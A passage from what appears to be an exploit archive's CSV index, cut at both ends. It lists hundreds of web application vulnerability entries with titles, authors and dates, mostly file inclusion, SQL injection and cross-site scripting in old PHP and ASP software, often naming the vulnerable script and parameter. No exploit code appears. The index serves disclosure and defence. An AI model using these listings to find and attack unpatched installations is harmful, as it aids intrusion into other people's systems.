'/engine/Ajax/editnews.php?root_dir' Remote File Inclusion",2007-03-10,"Hasadya Raed",webapps,php, +29733,exploits/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",webapps,php,80 +29736,exploits/php/webapps/29736.txt,"ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion",2007-03-12,"RaeD Hasadya",webapps,php, +29737,exploits/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",2007-03-13,"BorN To K!LL",webapps,php, +29742,exploits/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",webapps,php, +29744,exploits/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",webapps,php, +29745,exploits/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",2007-03-15,"Moritz Naumann",webapps,php, +29747,exploits/php/webapps/29747.txt,"DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting",2007-03-16,Mandr4ke,webapps,php, +29748,exploits/php/webapps/29748.txt,"Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal",2007-03-16,"BorN To K!LL",webapps,php, +29750,exploits/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,webapps,php, +29751,exploits/php/webapps/29751.php,"phpStats 0.1.9 - 'PHP-Stats-options.php' Remote Code Execution",2007-03-17,rgod,webapps,php, +29754,exploits/php/webapps/29754.html,"WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting",2007-03-19,"Alexander Concha",webapps,php, +29755,exploits/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,webapps,php, +29756,exploits/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",webapps,php, +29757,exploits/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection",2007-03-19,"laurent gaffie",webapps,php, +29758,exploits/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection",2007-03-19,"laurent gaffie",webapps,php, +29759,exploits/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection",2007-03-19,"laurent gaffie",webapps,php, +29760,exploits/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection",2007-03-19,"laurent gaffie",webapps,php, +29761,exploits/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass",2007-03-19,"Chris Travers",webapps,cgi, +29762,exploits/php/webapps/29762.txt,"Web Wiz Forums 8.05 - String Filtering SQL Injection",2007-03-20,"Ivan Fratric",webapps,php, +29763,exploits/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",webapps,php, +29764,exploits/php/webapps/29764.txt,"W-Agora 4.2.1 - 'profile.php?showuser' Cross-Site Scripting",2007-03-20,"laurent gaffie",webapps,php, +29765,exploits/php/webapps/29765.txt,"W-Agora 4.2.1 - 'search.php?search_user' Cross-Site Scripting",2007-03-20,"laurent gaffie",webapps,php, +29766,exploits/php/webapps/29766.txt,"W-Agora 4.2.1 - 'change_password.php?userid' Cross-Site Scripting",2007-03-20,"laurent gaffie",webapps,php, +29772,exploits/php/webapps/29772.txt,"Free File Hosting System 1.1 - 'contact.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,webapps,php, +29773,exploits/php/webapps/29773.txt,"Free File Hosting System 1.1 - 'login.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,webapps,php, +29774,exploits/php/webapps/29774.txt,"Free File Hosting System 1.1 - 'register.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,webapps,php, +29775,exploits/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusions",2007-03-26,Crackers_Child,webapps,php, +29776,exploits/php/webapps/29776.txt,"CcCounter 2.0 - 'index.php' Cross-Site Scripting",2007-03-26,Crackers_Child,webapps,php, +29780,exploits/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],webapps,php, +29782,exploits/php/webapps/29782.txt,"Satel Lite - 'Satellite.php' Local File Inclusion",2007-11-26,rUnViRuS,webapps,php, +29783,exploits/php/webapps/29783.txt,"Fizzle 0.5 - RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",webapps,php, +29786,exploits/php/webapps/29786.txt,"aBitWhizzy - 'whizzylink.php?d' Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,webapps,php, +30105,exploits/php/webapps/30105.txt,"WordPress Plugin Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",webapps,php, +30157,exploits/php/webapps/30157.txt,"Joomla! Component JD-Wiki 1.0.2 - 'dwpage.php?MosConfig_absolute_path' Remote File Inclusion",2007-06-06,DarkbiteX,webapps,php, +30158,exploits/php/webapps/30158.txt,"Joomla! Component JD-Wiki 1.0.2 - 'wantedpages.php?MosConfig_absolute_path' Remote File Inclusion",2007-06-06,DarkbiteX,webapps,php, +30107,exploits/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,webapps,php, +30109,exploits/php/webapps/30109.txt,"Particle Gallery 1.0 - 'search.php' Cross-Site Scripting",2007-05-30,Serapis.net,webapps,php, +30111,exploits/php/webapps/30111.txt,"MyBloggie 2.1.x - 'index.php' Multiple SQL Injections",2007-05-31,ls@calima.serapis.net,webapps,php, +30112,exploits/php/webapps/30112.txt,"PHP JackKnife 2.21 - '(PHPJK) G_Display.php?iCategoryUnq' SQL Injection",2007-05-31,"laurent gaffie",webapps,php, +30113,exploits/php/webapps/30113.txt,"PHP JackKnife 2.21 - '/(PHPJK) Search/DisplayResults.php?iSearchID' SQL Injection",2007-05-31,"laurent gaffie",webapps,php, +30114,exploits/php/webapps/30114.txt,"PHP JackKnife 2.21 - '/(PHPJK) UserArea/Authenticate.php?sUName' Cross-Site Scripting",2007-05-31,"laurent gaffie",webapps,php, +30115,exploits/php/webapps/30115.txt,"PHP JackKnife 2.21 - '/(PHPJK) UserArea/NewAccounts/index.php?sAccountUnq' Cross-Site Scripting",2007-05-31,"laurent gaffie",webapps,php, +30116,exploits/php/webapps/30116.txt,"PHP JackKnife 2.21 - '(PHPJK) G_Display.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-31,"laurent gaffie",webapps,php, +30118,exploits/php/webapps/30118.txt,"Prototype of an PHP Application 0.1 - '/gestion/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30119,exploits/php/webapps/30119.txt,"Prototype of an PHP Application 0.1 - '/ident/identification.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30120,exploits/php/webapps/30120.txt,"Prototype of an PHP Application 0.1 - '/ident/disconnect.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30121,exploits/php/webapps/30121.txt,"Prototype of an PHP Application 0.1 - '/ident/loginliste.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30122,exploits/php/webapps/30122.txt,"Prototype of an PHP Application 0.1 - '/ident/loginmodif.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30123,exploits/php/webapps/30123.txt,"Prototype of an PHP Application 0.1 - '/ident/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30124,exploits/php/webapps/30124.txt,"Prototype of an PHP Application 0.1 - '/ident/ident.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30125,exploits/php/webapps/30125.txt,"Prototype of an PHP Application 0.1 - '/menu/menuprincipal.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30126,exploits/php/webapps/30126.txt,"Prototype of an PHP Application 0.1 - 'param.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30127,exploits/php/webapps/30127.txt,"Prototype of an PHP Application 0.1 - '/plugins/PHPgacl/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30128,exploits/php/webapps/30128.txt,"Prototype of an PHP Application 0.1 - 'index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30129,exploits/php/webapps/30129.txt,"Prototype of an PHP Application 0.1 - 'common.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",webapps,php, +30131,exploits/php/webapps/30131.txt,"Buttercup WFM - 'Title' Cross-Site Scripting",2007-06-01,"John Martinelli",webapps,php, +30132,exploits/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) - Cross-Site Scripting",2007-06-01,"Glafkos Charalambous",webapps,php, +30133,exploits/php/webapps/30133.txt,"PHPLive! 3.2.2 - 'chat.php?sid' Cross-Site Scripting",2007-06-01,ReZEN,webapps,php, +30134,exploits/php/webapps/30134.txt,"PHPLive! 3.2.2 - 'help.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,webapps,php, +30135,exploits/php/webapps/30135.txt,"PHPLive! 3.2.2 - '/admin/header.php?admin[name]' Cross-Site Scripting",2007-06-01,ReZEN,webapps,php, +30136,exploits/php/webapps/30136.txt,"PHPLive! 3.2.2 - '/super/info.php?BASE_URL' Cross-Site Scripting",2007-06-01,ReZEN,webapps,php, +30137,exploits/php/webapps/30137.txt,"PHPLive! 3.2.2 - '/setup/footer.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,webapps,php, +30138,exploits/php/webapps/30138.txt,"Linker 2.0.4 - 'index.php' Cross-Site Scripting",2007-06-02,vagrant,webapps,php, +30140,exploits/php/webapps/30140.txt,"Okyanusmedya - 'index.php' Cross-Site Scripting",2007-06-04,vagrant,webapps,php, +30141,exploits/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 - 'Haberoku.asp' SQL Injection",2007-06-04,ertuqrul,webapps,asp, +30143,exploits/php/webapps/30143.txt,"WebStudio CMS - 'index.php' Cross-Site Scripting",2007-06-04,"Glafkos Charalambous",webapps,php, +30145,exploits/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent",2013-12-08,Vulnerability-Lab,webapps,ios, +30146,exploits/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,webapps,ios, +30152,exploits/php/webapps/30152.txt,"My Databook - 'diary.php?delete' SQL Injection",2007-06-04,Serapis.net,webapps,php, +30153,exploits/php/webapps/30153.txt,"My Databook - 'diary.php?year' Cross-Site Scripting",2007-06-04,Serapis.net,webapps,php, +30159,exploits/asp/webapps/30159.txt,"ASP Folder Gallery - 'Download_Script.asp' Arbitrary File Download",2007-06-06,freeprotect.net,webapps,asp, +30161,exploits/php/webapps/30161.txt,"Atom Photoblog 1.0.1/1.0.9 - 'AtomPhotoblog.php' Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,webapps,php, +30162,exploits/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous",webapps,php, +30165,exploits/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - 'Okul Portal Haber_Oku.asp' SQL Injection",2007-06-08,ertuqrul,webapps,asp, +30166,exploits/php/webapps/30166.txt,"WordPress 2.2 - 'Request_URI' Cross-Site Scripting",2007-06-08,zamolx3,webapps,php, +30168,exploits/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System - 'vBSupport.php' SQL Injection",2007-06-09,rUnViRuS,webapps,php, +30171,exploits/php/webapps/30171.txt,"JFFNms 0.8.3 - 'auth.php' Multiple SQL Injections",2007-06-11,"Tim Brown",webapps,php, +30172,exploits/php/webapps/30172.txt,"JFFNms 0.8.3 - 'auth.php?user' Cross-Site Scripting",2007-06-11,"Tim Brown",webapps,php, +30173,exploits/php/webapps/30173.txt,"JFFNms 0.8.3 - 'admin/adm/test.php' PHP Information Disclosure",2007-06-11,"Tim Brown",webapps,php, +30174,exploits/php/webapps/30174.txt,"JFFNms 0.8.3 - 'admin/setup.php' Direct Request Authentication Bypass",2007-06-11,"Tim Brown",webapps,php, +30175,exploits/php/webapps/30175.txt,"bbPress 0.8.1 - 'BB-login.php' Cross-Site Scripting",2007-06-11,"Ory Segal",webapps,php, +30177,exploits/php/webapps/30177.txt,"PlaySms 0.9.9.2 - Cross-Site Request Forgery",2013-12-10,"Saadi Siddiqui",webapps,php, +30205,exploits/asp/webapps/30205.txt,"Comersus Cart 7.0.7 - 'comersus_message.asp' redirectUrl Cross-Site Scripting",2007-06-20,Doz,webapps,asp, +30206,exploits/cfm/webapps/30206.txt,"FuseTalk 4.0 - 'forum/include/common/comfinish.cfm?FTVAR_SCRIPTRUN' Cross-Site Scripting",2007-06-20,"Ivan Almuina",webapps,cfm, +30202,exploits/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - 'AuthError.cfm' SQL Injection",2007-06-19,"Ivan Almuina",webapps,cfm, +29794,exploits/hardware/webapps/29794.txt,"Pirelli Discus DRG A125g - Remote Change SSID Value",2013-11-24,"Sebastián Magof",webapps,hardware, +29795,exploits/hardware/webapps/29795.pl,"Pirelli Discus DRG A125g - Local Password Disclosure",2013-11-24,"Sebastián Magof",webapps,hardware, +29796,exploits/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",webapps,hardware, +29797,exploits/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",webapps,php, +29802,exploits/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",webapps,hardware, +29805,exploits/php/webapps/29805.txt,"Drake CMS 0.3.7 - '404.php' Local File Inclusion",2007-03-30,"HACKERS PAL",webapps,php, +29806,exploits/php/webapps/29806.pl,"PHP-Fusion 6.1.5 Mod Calendar_Panel - 'Show_Event.php' SQL Injection",2007-03-31,UNIQUE-KEY,webapps,php, +29817,exploits/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - 'Fotokategori.asp' SQL Injection",2007-04-04,CoNqUeRoR,webapps,asp, +29821,exploits/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",webapps,php, +29824,exploits/php/webapps/29824.txt,"QuizShock 1.6.1 - 'auth.php' HTML Injection",2007-04-09,"John Martinelli",webapps,php, +29825,exploits/php/webapps/29825.txt,"UBBCentral UBB.Threads 6.1.1 - 'UBBThreads.php' SQL Injection",2007-04-09,"John Martinelli",webapps,php, +29827,exploits/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 - 'Keyboard.php' Local File Inclusion",2007-04-09,Liz0ziM,webapps,php, +29828,exploits/php/webapps/29828.html,"DeskPro 2.0.1 - 'login.php' HTML Injection",2007-04-09,"John Martinelli",webapps,php, +29829,exploits/php/webapps/29829.txt,"Einfacher Passworschutz - 'index.php' Cross-Site Scripting",2007-04-10,hackberry,webapps,php, +29830,exploits/php/webapps/29830.txt,"MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion",2007-04-10,hackberry,webapps,php, +29831,exploits/php/webapps/29831.txt,"DropAFew 0.2 - 'newaccount2.php' Arbitrary Account Creation",2007-04-10,"Alexander Klink",webapps,php, +29832,exploits/php/webapps/29832.txt,"DropAFew 0.2 - 'search.php?delete Action id' SQL Injection",2007-04-10,"Alexander Klink",webapps,php, +29833,exploits/php/webapps/29833.txt,"DropAFew 0.2 - 'editlogcal.php?save Action calories' SQL Injection",2007-04-10,"Alexander Klink",webapps,php, +29834,exploits/php/webapps/29834.txt,"WordPress Plugin dzs-videogallery - Arbitrary File Upload",2013-11-26,link_satisi,webapps,php, +29838,exploits/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,webapps,php, +29839,exploits/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,webapps,php, +29841,exploits/php/webapps/29841.txt,"PHPFaber TopSites 3 - 'admin/index.php' Directory Traversal",2007-04-11,Dr.RoVeR,webapps,php, +29842,exploits/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",webapps,cgi, +29844,exploits/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",webapps,cgi, +29845,exploits/php/webapps/29845.txt,"PHPwebnews 0.1 - 'iklan.php' Cross-Site Scripting",2007-04-07,the_Edit0r,webapps,php, +29846,exploits/php/webapps/29846.txt,"PHPwebnews 0.1 - 'index.php' Cross-Site Scripting",2007-04-07,the_Edit0r,webapps,php, +29847,exploits/php/webapps/29847.txt,"PHPwebnews 0.1 - 'bukutamu.php' Cross-Site Scripting",2007-04-07,the_Edit0r,webapps,php, +29848,exploits/php/webapps/29848.txt,"TuMusika Evolution 1.6 - 'index.php' Cross-Site Scripting",2007-04-12,the_Edit0r,webapps,php, +29849,exploits/php/webapps/29849.html,"ToendaCMS 1.5.3 - GET / POST Forms HTML Injection",2007-04-12,"Hanno Boeck",webapps,php, +29851,exploits/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - 'Check_login.asp' Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",webapps,php, +29852,exploits/php/webapps/29852.txt,"Doop Content Management System 1.3.x - Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,webapps,php, +29854,exploits/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - 'Img_Popup.php' Cross-Site Scripting",2007-04-14,the_Edit0r,webapps,php, +29855,exploits/php/webapps/29855.txt,"Flowers - 'Cas.php' Cross-Site Scripting",2007-04-14,the_Edit0r,webapps,php, +29861,exploits/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",webapps,php, +29862,exploits/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion",2007-04-16,BeyazKurt,webapps,php, +29863,exploits/php/webapps/29863.txt,"Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion",2007-04-16,SekoMirza,webapps,php, +29864,exploits/php/webapps/29864.php,"MyBlog 0.9.8 - 'Settings.php' Authentication Bypass",2007-04-16,BlackHawk,webapps,php, +29865,exploits/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 - 'showpic.php' Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,webapps,php, +29866,exploits/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections",2007-04-17,Aleksandar,webapps,php, +29868,exploits/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injections",2007-04-18,"John Martinelli",webapps,php, +29869,exploits/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",webapps,php, +29870,exploits/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - 'magpie_debug.php?url' Cross-Site Scripting",2007-04-20,"Hamid Ebadi",webapps,php, +29871,exploits/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting",2007-04-20,"Hamid Ebadi",webapps,php, +29872,exploits/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php?icodir' Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",webapps,php, +29874,exploits/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion",2007-04-20,Omni,webapps,php, +29876,exploits/php/webapps/29876.txt,"TJSChat 0.95 - 'You.php' Cross-Site Scripting",2007-04-23,the_Edit0r,webapps,php, +29877,exploits/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - '/contact/index.php?ripeformpost' SQL Injection",2007-04-23,"John Martinelli",webapps,php, +29878,exploits/php/webapps/29878.txt,"Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion",2007-04-23,Dr.RoVeR,webapps,php, +29879,exploits/php/webapps/29879.txt,"PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion",2007-04-23,MoHaNdKo,webapps,php, +29880,exploits/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusions",2007-04-23,InyeXion,webapps,php, +29882,exploits/php/webapps/29882.html,"PHPMySpace Gold 8.10 - 'article.php' SQL Injection",2007-04-23,"John Martinelli",webapps,php, +29883,exploits/php/webapps/29883.txt,"ACVSWS - 'Transport.php' Remote File Inclusion",2007-04-23,MoHaNdKo,webapps,php, +29885,exploits/php/webapps/29885.txt,"Claroline 1.x - RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,webapps,php, +29886,exploits/php/webapps/29886.txt,"Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion",2007-04-23,InyeXion,webapps,php, +29887,exploits/php/webapps/29887.txt,"Phorum 5.1.20 - 'admin.php?Groups Module group_id' Cross-Site Scripting",2007-04-23,"Janek Vind",webapps,php, +29888,exploits/php/webapps/29888.txt,"Phorum 5.1.20 - 'admin.php?modsettings Module smiley_id' Cross-Site Scripting",2007-04-23,"Janek Vind",webapps,php, +29889,exploits/php/webapps/29889.txt,"Phorum 5.1.20 - '/include/controlcenter/users.php' Multiple Method Privilege Escalations",2007-04-23,"Janek Vind",webapps,php, +29890,exploits/php/webapps/29890.txt,"Phorum 5.1.20 - 'admin.php?module[]' Full Path Disclosure",2007-04-23,"Janek Vind",webapps,php, +29891,exploits/php/webapps/29891.txt,"Phorum 5.1.20 - '/include/admin/banlist.php?delete' Cross-Site Request Forgery Banlist Deletion",2007-04-23,"Janek Vind",webapps,php, +29892,exploits/php/webapps/29892.html,"Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection",2007-04-23,"Janek Vind",webapps,php, +29893,exploits/php/webapps/29893.txt,"Phorum 5.1.20 - 'admin.php' badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",webapps,php, +29894,exploits/php/webapps/29894.txt,"Phorum 5.1.20 - 'admin.php' Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",webapps,php, +29895,exploits/php/webapps/29895.txt,"phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,webapps,php, +29898,exploits/php/webapps/29898.txt,"plesk 8.1.1 - 'login.php3' Directory Traversal",2007-04-25,anonymous,webapps,php, +29899,exploits/php/webapps/29899.txt,"MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion",2007-04-25,"Ali & Saeid",webapps,php, +29902,exploits/php/webapps/29902.txt,"PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php, +29903,exploits/php/webapps/29903.txt,"Ahhp Portal - 'page.php' Multiple Remote File Inclusions",2007-04-25,CodeXpLoder'tq,webapps,php, +29904,exploits/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2archives.php?b2inc' Remote File Inclusion",2006-04-25,alijsb,webapps,php, +29905,exploits/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2categories.php?b2inc' Remote File Inclusion",2006-04-25,alijsb,webapps,php, +29906,exploits/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2mail.php?b2inc' Remote File Inclusion",2006-04-25,alijsb,webapps,php, +29907,exploits/php/webapps/29907.txt,"Comus 2.0 - 'Accept.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php, +29908,exploits/php/webapps/29908.txt,"SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusions",2007-04-25,s3rv3r_hack3r,webapps,php, +29909,exploits/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusions",2007-04-25,alijsb,webapps,php, +29910,exploits/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php, +29911,exploits/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php?base_path' Remote File Inclusion",2007-04-25,alijsb,webapps,php, +29912,exploits/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php?base_path' Remote File Inclusion",2007-04-25,alijsb,webapps,php, +29913,exploits/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"Ali & Saeid",webapps,php, +29914,exploits/php/webapps/29914.txt,"Doruk100Net - 'Info.php' Remote File Inclusion",2007-04-26,Ali7,webapps,php, +29915,exploits/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",webapps,php, +29917,exploits/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",webapps,php, +29918,exploits/java/webapps/29918.txt,"Ametys CMS 3.5.2 - 'lang' XPath Injection",2013-11-30,LiquidWorm,webapps,java, +29921,exploits/php/webapps/29921.py,"Zend-Framework - Full Information Disclosure",2013-11-30,"Ariel Orellana",webapps,php, +29924,exploits/hardware/webapps/29924.txt,"TP-Link TD-8840t - Cross-Site Request Forgery",2013-11-30,"mohammed al-saggaf",webapps,hardware, +29927,exploits/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-30,sajith,webapps,hardware, +29929,exploits/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - 'BRY.asp' SQL Injection",2007-04-26,RMx,webapps,asp, +29933,exploits/asp/webapps/29933.txt,"Gazi Download Portal - 'Down_Indir.asp' SQL Injection",2007-04-30,ertuqrul,webapps,asp, +29935,exploits/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,webapps,php, +29938,exploits/php/webapps/29938.txt,"E-Annu - 'home.php' SQL Injection",2007-04-30,ilkerkandemir,webapps,php, +29941,exploits/php/webapps/29941.txt,"CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection",2007-05-02,"Daniel Lucq",webapps,php, +29944,exploits/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion",2007-05-03,"ilker Kandemir",webapps,php, +29946,exploits/php/webapps/29946.txt,"Multiple WordPress Orange Themes - Cross-Site Request Forgery (Arbitrary File Upload)",2013-12-01,"Jje Incovers",webapps,php, +30197,exploits/php/webapps/30197.txt,"WSPortal 1.0 - 'content.php' SQL Injection",2007-06-18,"Jesper Jurcenoks",webapps,php, +30198,exploits/asp/webapps/30198.txt,"TDizin - 'Arama.asp' Cross-Site Scripting",2007-06-18,GeFORC3,webapps,asp, +30199,exploits/cgi/webapps/30199.txt,"WebIf - 'OutConfig' Local File Inclusion",2007-06-18,maiosyet,webapps,cgi, +30059,exploits/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",webapps,php, +29953,exploits/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion",2007-05-07,kezzap66345,webapps,php, +29955,exploits/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,webapps,php, +29956,exploits/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - 'order_form.php?PATH_INFO' Cross-Site Scripting",2007-05-02,CorryL,webapps,php, +29957,exploits/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_INFO' Cross-Site Scripting",2007-05-02,CorryL,webapps,php, +29958,exploits/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' SQL Injection",2007-05-07,"ilker Kandemir",webapps,asp, +29959,exploits/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",webapps,hardware, +29960,exploits/php/webapps/29960.txt,"SunShop Shopping Cart 4.0 - 'index.php' Multiple SQL Injections",2007-05-07,"John Martinelli",webapps,php, +29961,exploits/php/webapps/29961.txt,"SunShop Shopping Cart 4.0 - 'index.php?l' Cross-Site Scripting",2007-05-07,"John Martinelli",webapps,php, +29962,exploits/cgi/webapps/29962.txt,"OTRS 2.0.4 - index.pl Cross-Site Scripting",2007-05-07,ciri,webapps,cgi, +29963,exploits/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - 'index.php' Cross-Site Scripting",2007-05-07,Red_Casper,webapps,php, +29965,exploits/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - 'picture.php' Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",webapps,php, +29966,exploits/php/webapps/29966.txt,"Campsite 2.6.1 - 'Alias.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29967,exploits/php/webapps/29967.txt,"Campsite 2.6.1 - 'article.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29968,exploits/php/webapps/29968.txt,"Campsite 2.6.1 - 